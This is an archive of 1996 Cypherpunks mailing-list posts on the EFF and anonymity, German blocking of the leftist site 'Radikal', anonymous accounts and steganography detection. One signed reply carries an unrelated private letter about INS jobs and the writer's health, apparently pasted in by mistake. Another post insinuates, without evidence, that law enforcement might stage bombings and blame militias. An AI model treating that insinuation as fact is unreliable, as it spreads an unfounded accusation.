>complaining about the sloth and sin of the younger generations.

Hey, I'm 47, and I haven't given up on sloth and sin yet.  8-)

Seriously, the problem here is that you don't want to set up the stereotype
you allude to further down ('don't trust anyone over 30'). Stereotypic
thinking, ya know? Besides which, I've run into some real dorks who were
UNDER 30...

>(Caveat: I'm 44, so I'm certainly a generation older than many of you, and
>am about the same age, give or take a few years, of Dyson, Metcalfe, Kapor,
>Denning, and the other Net.Doomsayers. However, 20-25 years ago, when I was
>in college, I recall of course similar predictions of disaster. (And as it
>turned out, the predictions that promiscuity would lead to a disaster
>turned out to be partly correct, viz. AIDS.))

Hmmmmm...are Dyson and Kapor really net.doomsayers? I really haven't heard
any kinda doom and gloom from those two...

>Robert Metcalfe, inventor of Ethernet and founder of 3COM, and how
>publisher of "Infoworld" and sailing enthusiast, was interviewed on CNBC a
>few minutes ago. He repeated his prediction of an "Internet collapse" in
>1996, based on overuse, on bad pricing models, on lack of controls, and on
>other concerns.

... and I've tended to think Metcalfe was just sending an 'ad absurdum'
flare when he predicted the death of the Internet, not so much predicting as
taking an impact analysis to the extreme.

>It could be that the Dennings, Dysons, Kapors, etc. of the world are simply
>growing jaded with the Net and are projecting their own ennui in their
>comments that the Net may need to be controlled. This may come with age, as
>I'm sure the Kapor of 25 years ago would not have wanted President Nixon
>and Attorney-General Mitchell telling him what he could read and write.

I'm not sure which comments you're referring to, but I've come to understand
that the generation-gap thing has no pat answer.  Dave Farber is younger
than Bruce Taylor, if ya know what I mean...and there are plenty of old
pharts who are active in the various movements and groups opposing any
restriction of the Internet.


>(In fairness, none of these folks listed have called for censorship. But
>all have expressed "concerns" of one sort or another. Not that discussing
>concerns is inappropriate--after all, we do it all the time. But I sense in
>many of their phrasings of concerns a stereotypical "old fogeyness"
>emerging.)

I dunno. Consider this: almost 30 years ago a bunch of us were more or less
active in left wing politics that had some of the same aims I see expressed
on this list and elsewhere, and we made mistakes. I don't know that I
learned from my mistakes the way you're sposed to, but some folks learned,
and are trying not to fuck up again.

On the other hand, some folks really are just stodgy, but I bet they were
stodgy kids, too.

>Just a thought. Maybe the solution to the EFF problem is to "not trust
>anyone over 30."

Heh, right. Feet tall.

--
Jon Lebkowsky           http://www.well.com/~jonl              jonl@hotwired.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Fri, 6 Sep 1996 19:05:29 +0800
To: Asgaard <asgaard@Cor.sos.sll.se>
Subject: Re: ... subversive leftists
In-Reply-To: <Pine.HPP.3.91.960905130656.27617B-100000@cor.sos.sll.se>
Message-ID: <199609051915.OAA03527@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----



HI

FOUND THE NOTICE ABOUT IMMIGRATION AND NATURALIZATION SERVICE (INS) JOBS!

THEY ARE RECRUITING FOR APPROXIMATELY 1500 ADMINISTRATIVE AND SUPPORT
STAFF TO BE HIRED AND ON-BOARD BY SEPTEMBER 30, 96.

TYPES OF POSITIONS:

    IMMIGRATION INFORMATION OFFICERS
    ADMINISTRATIVE AND SUPPORT STAFF
    DEPORTATION CLERK
    INVESTIGATIVE ASSISTANTS
    IMMIGRATION STATUS VERIFIER
    IMMIGRATION RECORDS TECHNICIAN
    APPLICATION CLERKS
    MOTOR VEHICLE OPERATOR
    AUTOMOTIVE MECHANICS
    FENCE REPAIRMAN
    LAW ENFORCEMENT COMMUNICATIONS ASSISTANT
    ELECTRONICS TECHNICIAN

HEADQUARTERS PERSONNEL VACANCY HOTLINE: (202) 514-4711
(VIRGINIA, WASHINGTON DC)

ADMINSTRATIVE CENTER, BURLINTON, VT:  (902) 660-1116
(CT, DE, ME, MD, MA, NJ, NY, PA, PUERTO RICO, VT, WV)

ADMINISTRATIVE CENTER, DALLAS, TX: (214) 767-5884
(AL, AR, FL, GA, KY, LA, MS, NM, NC, OK, SC, TN, TX)

ADMINISTRATIVE CENTER, TWIN CITIES, MN: (612) 725-3897  RECORDING (612)
725-3880 (CO, DENVER, ID, IL, IO, KS, MI, MN, MO, MT,NE, ND, OH, SD, UT,
WI, WY)

ADMINISTRATIVE CENTER, LAGUNA NIGUEL, CA: (714) 360-3058
(AL, AR, CA, HI, GUAM, NE, OR, WA)



SORRY IT TOOK SO LONG TO FIND.  THIS WAS ON OUR OCPM EASTERN REGION BBS
MESSAGE 07-17-96, FROM JACKIE MCLEER, SUBJECT: DEPARTMENT OF JUSTICE
RECRUITMENT.


I GUESS YOU HAVE HEARD BY NOW THAT PLANS FOR REGIONIZATION HAS BEEN PUT ON
HOLD DO TO LACK OF MONEY.

THEY SAY WE WON'T BE GOING ANY WHERE OR DOING ANY THING UNTIL AT LEAST
1999.

THERE IS TALK OF A RIF HERE!  50 PEOPLE THIS YEAR (97) AND 50 THE NEXT TWO
YEARS(98 & 99). WE HAVE TO BE DOWN TO 160 BY THE YEAR 2000.

I THINK MY JOB IS SAFE, THEY CAN'T GET THE WORK DONE NOW WITH 12 PERSONNEL
ACTIONS CLERK I CAN'T  SEE THEM DOING IT WITH LESS.


DID YOU HAVE A NICE HOLIDAY?  DO ANYTHING SPECIAL?  

WE HAD RAIN ALL FOUR DAYS - (I HAD TAKEN OFF FRIDAY) - BUT IT WAS GREAT
JUST NOT BEING AT WORK!

I HAD BILL'S BIRTHDAY PRESENT DELIVERED EARLY (SEPT 18 IS HIS B'DAY).  I
GOT HIM A TV HE COULD SEE WITHOUT SITTING ON TOP OF -- RCA 52 INCH
PROSCAN.  IT'S GREAT AND HE SEEMS TO REALLY LOVE IT.  I DON'T WATCH ENOUGH
TO MATTER, BUT IT IS NICE FOR MOVIES.  SHELLY AND HER DAUGHTER LESLIE CAME
OVER FRIDAY EVENING TO HAVE PIZZA AND WATCH A MOVIE.  THEY LIKED IT TOO!

HOPE THINGS ARE GOING BETTER THERE.  MY JOB IS GOING OK FOR NOW BUT A LOT
OF THIS IS MEDICATION. MY DOCTOR PUT ME ON SOMETHING AGAIN WHEN I SAW HIM
LAST MONTH.  BLOOD PRESSURE WAY UP AND STARTING TO FEEL LIKE I WOULD CRY
ANY MINUTE OVER ANYTHING!  I SEE HIM AGAIN SEPT 13 MAYBE HE'LL TELL ME
EVERYTHINGS OK (HA!:)

THATS ALL FOR NOW - ITS SOMEWHERE AROUND 4 AM AND I HAVE TO GET READY FOR
WORK.

HI TO HOLLY!

LOVE YA!

KATHY
In <Pine.HPP.3.91.960905130656.27617B-100000@cor.sos.sll.se>, on 09/05/96 at 01:23 PM,
   Asgaard <asgaard@Cor.sos.sll.se> said:

>On Wed, 4 Sep 1996, Declan McCullagh wrote:

>> The German Generalbundesanwaltschaft (Chief Federal Prosecutor's
>> office) has "advised" the Internet providers to block access to

>> "Radikal" (http://www.xs4all.nl/~tank/radikal) is a publication
>> from the radical left that is illegal in Germany, but not in
>> the Netherlands.

>This is amazing. Without defending the German stand on the Revisionist
>crap, that part is at least understandable in a historical context
>(their sense of guilt for the unfortunate developments in the 30's
>and 40's etc). But a quick overview of the contents of Radikal gives the
>impression of an ordinary leftist zine, defining the outlawing of it as
>pure political censorship in a Western 'democracy'. I'm truly surprised.

>Asgaard

Is there an URL with a English version?

I am always curious to see what governments think they should "protect" their citizens from.


Thanks,

- --
- -----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Merlin Beta Test Site - WarpServer SMP Test Site

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
- -----------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMi8ubY9Co1n+aLhhAQEA2AP+N9svCUkXskUhLE3AQ/O1EyaqAPQS5CKm
jAqKfnPjfTwFYxdZyE/XPrL+K877JTL1R6aDSN+cHb+YsmOQES4Zxj9AyshZbM1h
5P9Yw7448JUNp/ve4kdBkVJ1e+/+PuojKqnqmET1+a4uCywi3tG4D5XIN1jOFNsX
4ReMh+U5XkU=
=Gr7I
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman OBC)
Date: Fri, 6 Sep 1996 19:32:39 +0800
Subject: Declaring The Ultimatum To Fascist Germany
In-Reply-To: <ae54579106021004ce78@[207.167.93.63]>
Message-ID: <199609052104.OAA00829@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! (I also don't dislike Germans in general. I studied some German in high
! school--don't ask me to use it, though!--and have visited Germany. They
! just have a certain well-known tendency to take the authoritarian path at
! times.)

Yes.  How to get an anonymous Unix shell account in Germany, Singapore
and the UK?  Easy here, but is some *law* or custom in Germany to
force ISP customers to show to demand passports or Germany's national
ID card the citizens are forced to carry at all times under penalty
of jail for the failure to do so?

There's obvious reasons why I and Declan would like to get accounts
anonymously.  But I'd do it with my passport name if I am able to do
so.  Distributing censored information carries more of a political
statement if conducted by those with accounts that are located in the
unfree country itself.  If something like Gerhard Lauck is practical
proof, only those who intend to actually ever go to Europe or Asia
in the status quo need worry about actually getting incarcerated for
situationist anti-censorship activities.  Who cares, I don't, 
personally.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Fri, 6 Sep 1996 16:43:53 +0800
To: Anonymous <nobody@zifi.genetics.utah.edu>
Subject: Re: Race Bit: C
In-Reply-To: <199609050630.AAA07395@zifi.genetics.utah.edu>
Message-ID: <Pine.SUN.3.95.960905140828.10614D-100000@netcom2>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 5 Sep 1996, Anonymous wrote:

> defunded 100%, IMO). Violence begats violence which begats even larger
> government, don't start us on that road -- leave me in peace.

	If I understand you correctly, it is OK for a government to
	institute violence against the residents of the land it claims
	dominion over, but it is not acceptable for the inhabitants of
	that piece of land to respond in self defence.

        xan

        jonathon
        grafolog@netcom.com



	However, if you're tired of the Lesser of N evils, 
	Cthulu's export policy is that you can't escape 
	anyway, and your puny mortal lives will be absorbed 
	along with his morning coffee.  Your encryption 
	technology is futile against the Elder Gods, and the 
	arcane formulas in the Cyphernomicon of that mad 
	physicist Tim The Enchanter may summon spirits from 
	the vasty deep, but no secrets are safe from 
	Nyarla-S-Ahothep who knows all and sees all.
				Bill Stewart






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Omegaman" <omega@bigeasy.com>
Date: Fri, 6 Sep 1996 19:25:15 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: What is the EFF doing exactly?
Message-ID: <199609051928.OAA19142@bigeasy.com>
MIME-Version: 1.0
Content-Type: text/plain


> If anyone objects the officals responsible make a wide gesture and say "We
> didn't take away your phones, CRIMINALS took away your phones."

Indeed. It appears the Unabomber has taken away the privelege of 
dropping stamped mail weighing over 16ozs into street-side mailboxes. 
One is now instructed to take these packages to a post-office mail 
clerk for mailing.

(Of course it's unclear just what would be done if a package 
weighing over that magical 16ozs was left in a mailbox)


> The real question is this, what are you going to do to anihilate anonymous
> communication, because if you think its harmful that's what you have to
> do.
> 

What strikes me as odd is that the arguments against anonymous 
communication are nearly identical to those against strong crypto.  
ie. the same four horsemen flare up in these discussions.  Yet we 
have parties who are ostensibly pro-crypto but anti-anonymity.

To put it in a nutshell, in a free society I can have a private 
conversation, but I must essentially announce that I am having one 
and who I am having that conversation with?


Do you believe the benefits of privacy outweigh the costs?  Do you 
feel the same about cryptography and believe it to be an essential 
tool to advance the privacy of individuals?  

Then you _must_ be an advocate of anonymity and anonymous 
communications.  Privacy as a right and a reality does not exist 
without the capability for anonymity.

me
--------------------------------------------------------------
 Omegaman <mailto:omega@bigeasy.com>
 PGP Key fingerprint =  6D 31 C3 00 77 8C D1 C2  
                        59 0A 01 E3 AF 81 94 63 
Send a message with the text "get key" in the 
"Subject:" field to get a copy of my public key.
--------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@zifi.genetics.utah.edu (Anonymous)
Date: Fri, 6 Sep 1996 19:20:26 +0800
To: cypherpunks@toad.com
Subject: Subject: Re: Race Bit: C
Message-ID: <199609052031.OAA10096@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


No need to send to :Anonymous <nobody@zifi.genetics.utah.edu>

But since you did

>Cc: cypherpunks@toad.com

saying

...

>	If I understand you correctly, it is OK for a government to
>	institute violence against the residents of the land it claims
>	dominion over, but it is not acceptable for the inhabitants of
>	that piece of land to respond in self defence.

I will say this:

No, government initiation of violence (such as in Waco, Ruby Ridge, etc.) is not OK,
and AsPol initiation of violence is not either. This can lead into a long argument about
just _when_ violence is initiated, where opinion is more important than fact, but IMO:

Randy Weaver was not initiating violence.

David Keresh was not initiating violence.

Pot growers and smokers are not initiating violence. But

Mr. Bell, if he follows through on his scheme, *will* be initiating violence. His scheme,
while it can sound tempting (especially every April 15th!) has no guarantee that it will
_only_ be used against the Lon Horiuchis of our government, in fact, it may be said it
is not guaranteed to not be used against Mr. Bell himself, as many have joked. There
are two roads to take in life, convincing and coercing others. I think that the former is
still possible, Mr. Bell and many others disagree. I worry that abuse of the very young
and weak (for now) anonymity system for the purpose of initiating, rather than exposing,
violence will lead to more government violence than we already have. Perhaps I am
wrong and there is no hope; but if so, that means another revolution. Revolutions are
very romantic sounding, to those who have not been in a war. I urge everyone to read
"Emancipating Slaves, Enslaving Free Men" by Jeffrey Rogers Hummel for a look at
what our last revolution got us (hint: it was *not* less government). I believe the book
is available from Laissez Faire books. It is quite good, and refreshingly truthful when
compared to the gobbledygook that most history teachers try to force down students'
 throats.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Sat, 7 Sep 1996 06:38:58 +0800
To: cypherpunks@toad.com
Subject: Cypherpunk meeting?
Message-ID: <842032190.16862.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hi all,

I`m just dashing off a quick note to see how many south eastern UK 
cypherpunks there are here, preferably in the sussex area, I might 
organise a meet if we can get enough people to make it worthwhile

mail me if you are an experienced cryptographer in the area and would 
be interested in attending an informal meeting for key signing, 
discussion and copious beer.... ;-)


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: cp850

iQCVAwUBMi7qLb5OPIRbv66xAQGGqQP/cJI2sWgCc0cR8jlTDbCv0W2hklW5++7K
oO23Qs7sxNQziK1lcEzIKX1kbQIng/apR4FEEhWggS+Bvadx3NNpW46BdHTI7IfZ
rjE8M4K0EtYcDUZmsAG0pV70b8XKu+v/dogu/BlIFwAUCwR2ocDeIbW88tBXq4ok
dcffJFY2Q4Q=
=PCNL
-----END PGP SIGNATURE-----

  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4=
=riHc
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stanton McCandlish <mech@eff.org>
Date: Fri, 6 Sep 1996 19:39:30 +0800
To: whgiii@amaranth.com (William H. Geiger III)
Subject: Re: What is the EFF doing exactly?
In-Reply-To: <199609050409.XAA28542@mailhub.amaranth.com>
Message-ID: <199609052242.PAA24752@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


> >If this is the case she needs to be _much_ more careful about what she
> >says in `personal' interviews.
> 
> <sigh>
> 
> There seems to be a point being missed in this thread. :(
> 
> This was not a 'personal' interview. The paper was not interested in 
> Ms. Dyson's views on anonymity on the internet because she seemed like a 
> nice person. The only reason she was interviewed is because of her 
> position with the EFF as chairwoman. 

Rather unlikely, actually. Dyson is far better known, everywhere but the
Internet early-adopter crowd, as publisher of Release 1.0 and an industry 
analyst. Same goes for a lot of our other boardmembers. Who many people 
outside of the civ-lib crowd know Jane Metcalfe from EFF, vs. from Wired? 
Even Mitch Kapor is better know as founder of Lotus than of EFF. A lot of 
press coverage she gets never even mentions EFF at all!  Barlow's 
probalby the only exception - retired ranchers and songwriters who aren't 
also singers generally don't attract many reporters.


--
<HTML><A HREF="http://www.eff.org/~mech/">    Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>        Online Activist    </HTML>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Fri, 6 Sep 1996 19:23:21 +0800
To: Stephan Schmidt <schmidt@pin.de>
Subject: Re: German prosecutors redouble attack on Net, subversive leftists
In-Reply-To: <Pine.LNX.3.94.960905181843.5557A-100000@blau.pin.de>
Message-ID: <Pine.SUN.3.91.960905160453.12599F-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Looks like a more extensive translation now is available at:

  http://www.anwalt.de/ictf/p960901e.htm

Tho it's still not complete. The criminal law links are only available in 
German, for instance.

-Declan


On Thu, 5 Sep 1996, Stephan Schmidt wrote:

> On Thu, 5 Sep 1996, Declan McCullagh wrote:
> 
> > 
> > You're not talking about http://www.anwalt.de/ictf/p960901e.htm, are you?
> > 
> 
> I'm talking about this link (you mentioned earlier).
> 
> 
> Maybe I can translate it (or I can summarize it).
> (tomorrow :)
> 
> -stephan
> 
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Schmidt <schmidt@pin.de>
Date: Fri, 6 Sep 1996 17:26:31 +0800
To: "D. Moeller" <moe-san@stadt.com>
Subject: Re: FWD: Another try to kill democracy
In-Reply-To: <322EA63D.35B5@stadt.com>
Message-ID: <Pine.LNX.3.94.960905171644.4675A-100000@blau.pin.de>
MIME-Version: 1.0
Content-Type: text/plain


> No problem in gaining access so far. I even traces through Telekom and
> C-Serve - no trace of restrictions.
> 
> Maybe just a way to generate traffic to a lame site?
> 

Definetly not.
There is an advisory from the Generalbundesanwaltschaft and
the ICTF that ISPs should ('have to') restrict the access to
those urls.

But so far nothing happend. I asked some people
to try the urls and there where no restrictions.
(I encounterd no restrictions myself.)

-stephan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Fri, 6 Sep 1996 17:08:18 +0800
To: cypherpunks@toad.com
Subject: Tack of Internet censorship
Message-ID: <199609051526.RAA18328@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Six months ago, the Internet censors and Exon wannabees took the
tack of "the Internet is too hard to censor".

Now, their motto is "There will be some who get around our
censorship, but we will try anyway."

Unfortunately, I believe these censorship strikes will
keep happening unless we find a way to stalemate them.

What I am proposing is that Apache or other WWW servers
have a way to allow access to site B's URL at site A,
similar to the old trick of finger user@sitea.com@siteb.com.

Implementation should be simple.  However, I wonder what
is a good standard way to specify this in the URL or
a site.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 6 Sep 1996 06:34:59 +0800
To: mech@eff.org
Subject: Re: What is the EFF doing exactly?
In-Reply-To: <199609042341.QAA14459@eff.org>
Message-ID: <199609051650.RAA00376@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Stanton McCandlish <mech@eff.org> writes on cpunks:
> Adam Back <aba@dcs.ex.ac.uk> typed:
> >
> > No.  But I too am rather suprised to hear an EFF board member
> > apparently speaking against free speech.  OK, so maybe she was
> > mis-quoted so I wait for her rebuttal, but nope, she basically to my
> > reading reiterates nothing but negative opinions on free speech and
> > anonymity.
> >
> > Tim's quotes of her CFP speech further demonstrates her leanings.
> 
> I've talked to her personally about this.  She's not thinking along those 
> lines, she just perceives a potential problem in the 
> accountability/ethics area, and is wondering how that can be solved, 

it can't,

> if it can be solved, and what the price of such a solution is.

the price for removing anonymity is the price of loosing strongly free
speech (you know real free speech, as opposed to `free speech' where
you can say what you want provided you provide your ID up front to the
thought police, just in case at some future date you say something
that someone somewhere in some region of the world finds mildly
objectionable).  The draconian measures necessary to even start also
involve GAK, outlawing of non-GAKed crypto, placing import
restrictions on crypto (I saw Freeh quoted as saying that restricting
crypto imports may be necessary recently, something I predicted some
years ago) draconian thought police laws, and so on.

It's quite simple to envisage: place yourself in the position of the
overzealous law enforcement type, imagine you are tasked with
elminating encryption, free speech on the internet, anonymity.  So
what're you going do?  First thing you might notice is that pretty
near everyone is against you.  So you work up a few four horseman
scare stories, try to squelch all the first ammendment based
challenges in the courts, do a few oblique trade-offs with companies
exchanging key escrow for more bits, maybe blow up a few airplanes,
and federal buildings and blame it on `militias', and the Internet.
Rant about the Internet at each opportunity whether has anything to do
with it or not (did the perps even know anyone with internet access,
do they have a distant cousin who does, there must be an angle
somewhere, or heck who cares, just shout about the Internet anyway,
no one'll notice it's nothing to do with it).  You realise that you're
going to have to get pretty mean to actually stamp out free speech for
all these people with a quaint wish to uphold the constitution, and
protect their freedoms.  Russia just about managed it for a while but
they shot about 1 in 10 people in the process, they had licenses to
own a photocopier, a typewriter, samples had to be provided to the
KGB.

> Honest, she's not *advocating* restrictions on anonymity, just
> asking if any are necessary, 

no, they are not

> in who's opinion, 

mine, most cpunks, yours? the rest of the EFF board?

> with what rationale, at what cost, and by what mechanism.

rationale above: the alternative loss of freedoms is too costly, look
at Singapore's example.

> > Lets put it this way: if Louis Freeh offered to be an EFF board
> > member, would you take him on board?  If he seemed quite
> 
> Highly unlikely.  Who gets to be a boardmember is decided by a board vote.
> Freeh's anti-freedom history, and his obnoxious nature would, in my 
> guesstimate, give him less that a .0000000000001% chance of ever making 
> it onto the EFF board. And that's being nice. :)
> 
> Dyson has no such history, and does have a history of careful thought 
> (even if disagreed with by quite a few people) about networks, online 
> commerce, negative effects of regulation, and civil liberties issues.
> More the former 3 than the latter 1.  

So it seems.  If she has little to say on civil liberties, perhaps she
should refrain.  William Geiger <whgiii@amaranth.com> corrected me in
this thread, his reading is that Dyson's interview was not a personal
interview, she was being interviewd _as_ an EFF board member, she just
chose to make a personal statement in it.  If this is the case I
submit the correct comment on her part would have been that the EFF
had no current position on the topic.

> > pro-anonymity, and free speech, and later turned out to be having 
> > doubts, would you keep him?
> 
> I'll generalize that to "if you had any boardmember who expressed doubts 
> about the value of free speech and privacy, would the board keep them?"
> I think not. But Esther's taken no such position. She's asking questions 
> about the mechanics of a system, and the effects of the system on society.  
> These are valid questions.  It'd be helpful to see some short 
> Cypherpunks-generated answers, if they are available.  Stuff about 
> reputational systems, etc.  

Personally I think I'm better at coding, than constructing convincing
arguments.  But for what it's worth here's a few.  I doubt they are
news to you, but since you kind of asked:

Tim's cyphernomicon isn't short but should be a required reading, IMO.

The US constitutional protections for free speech?

The Singaporean demonstration of the alternative?

The principle of having laws against crimes, not against the potential
means of comitting crimes.  You know, you can't carry a knife, why
not?  Because you might commit a crime.  So why not wait see if you do
commit a crime.  You could just as easily stab someone with a screw
driver, so what now, outlaw carrying of screw drivers, have permits to
carry a screw driver?  Sad fact is you can probably get successfully
prosecuted for carrying a screw driver if you can't demonstrate a need
to carry one already.  You see where this line of reasoning heads.  It
is ultimately useless to make it illegal for people to have any means
to commit crimes.  Crimes with victims are already illegal, we don't
need anymore laws, we've got way too many already.  If someone goes
out and murders someone, the police attempt to catch the murderer to
prevent further murders.  We don't need dumb laws outlawing cars (so
the guy can't drive away from the scene?), knives, guns, the internet
(in case he plots to off someone), the phone system in case he uses
that, pay phones in case he uses one of those, what comes next, you
know?  Several things which were proposed in jest by cypherpunks which
were thought too outlandish to be next in line for banning, were
actually seriously proposed and even implemented.  It never ceases to
amaze me the things the law enforcement types think up.

Perhaps when the technology is up to it we ought to just implant a CCD
chip behind newborn's eyeballs, and have a life escrow system to just
record ever last second of everyones existance just in case they have
the urge to drive over 55, or not divulge their true name, social
security number, address etc. in a casual electronic conversation.

> Just to be clear: There is no disagreement on the board, or the staff, of 
> EFF that anonymity is a vital component of privacy. 

yay :-)

Now all you need to do is have an official policy that says so, so
that board members who are less clear on the subject, can quote that
policy rather than discussing their own opinions :-)

Guess I've said all that I can on this sub-thread, so I'll leave you
to continue with important EFF work, trying to knock down all those
son of CDAs the individual states are even now crafting,

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Schmidt <schmidt@pin.de>
Date: Fri, 6 Sep 1996 18:52:31 +0800
To: Gary Howland <gary@systemics.com>
Subject: Re: German prosecutors redouble attack on Net, subversive leftists
In-Reply-To: <322E94B9.41C67EA6@systemics.com>
Message-ID: <Pine.LNX.3.94.960905175321.4926A-100000@blau.pin.de>
MIME-Version: 1.0
Content-Type: text/plain



> I wonder how they are doing this?  We know that the Germans allow full

There is an advisory around where the ISPs say that
they think it's not possible to block urls.

And even if they figure a way out to do this,
this mailing list proves (mirrors) that it's not
possible to stop the flow of information.
But the German Government doesn't seem to even
understand a bit how the inet works.

> this would increase the size of the blacklist that the Germans must use,

The Germans. I don't like this evil German bashing.
(which is quite obvios in some mails, although I
think not in this one, but I had to say this)
Some of us (some may say most, I'm not) are quite normal and
there are even some cypherpunks around :)

And as there are lots of ISPs in Germany (as in every
other country) they won't get everyone to resctrict the access
to some pages.

-stephan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amnesia@chardos.connix.com (Anonymous)
Date: Fri, 6 Sep 1996 19:05:21 +0800
To: Cypherpunks@toad.com
Subject: No Subject
Message-ID: <199609052210.SAA11602@chardos.connix.com>
MIME-Version: 1.0
Content-Type: text/plain


On  5 Sep 96 at 0:30, Anonymous, a man with a double standard wrote:

> For them, I would go to jail; for you, I would even cooperate > with  the BATF (which should be defunded 100%, IMO). 

Why would you go to jail?  
Who made jails?
Who would use violence to bring you in?

jfa








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Schmidt <schmidt@pin.de>
Date: Fri, 6 Sep 1996 05:15:22 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: German prosecutors redouble attack on Net, subversive leftists
In-Reply-To: <v01510109ae54ba2ba693@[204.62.128.229]>
Message-ID: <Pine.LNX.3.94.960905181843.5557A-100000@blau.pin.de>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 5 Sep 1996, Declan McCullagh wrote:

> 
> You're not talking about http://www.anwalt.de/ictf/p960901e.htm, are you?
> 

I'm talking about this link (you mentioned earlier).


Maybe I can translate it (or I can summarize it).
(tomorrow :)

-stephan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 6 Sep 1996 19:37:09 +0800
To: makofi <cypherpunks@toad.com
Subject: Re: Steganography -- Tell Tale Signs?
In-Reply-To: <199609050421.VAA21428@sirius.infonex.com>
Message-ID: <Pine.LNX.3.95.960905184816.709A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 4 Sep 1996, makofi wrote:

> 1) If I hide some PGP encrypted data in a
> gif, jpg or wav file will there be any tell tale 
> signs to the naked eye of an expert? If yes,
> what are they?

I don't think so.  Especially for jpg which uses a lossy compression scheme.
Any random noise could be attributed to the compression.  There is already
enough noise in wav files that inverting one bit won't make much of a
difference.

> 3) Are there any tools at the moment 
> to expose (not crack) the hidden encrypted 
> data? If none. are there tools in development?

The whole point of steganography is plausible denial.  The data that someone
could de-stego from a file should just be random garbage, in which case there
would be no way of telling whether there was an encrypted file stegoed in the
data file.  If PGP files are used, a utility like Stealth is a must.

- -- Mark

PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMi9aFCzIPc7jvyFpAQFyUggAkBekMcImimtOOtXMavb+YFj6uNLnlgKu
leuX37PwQn9ROHjYBiZvhLpTWo8vn5cATI6apN0HUHW81Iy9bss67KkWY/x1tb34
qqR1KMYpEF8MexyiqKxFkOC9Zy/OcufPFIauV2TVlxPXY9m6whH8LPLV81EMYB0M
kAYLGfbDkgQFEgP8prm7AAqArSL7jt80t6OQWOVJU4CebBK5P0onR+9tujhyxrdX
N/GjpeW4cIdn+C3pW6bdxlwgRne9b9dAPcbEeLCOhFwnhBtO1tvg+OyKzPrmVuEh
OaKBwfwSRiGbBCaGv9EXmTIxEGqFfFGioEhRwwCvKsL9JW3NZevSKg==
=CuOh
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Schmidt <schmidt@pin.de>
Date: Fri, 6 Sep 1996 20:08:03 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Herr Schmidt
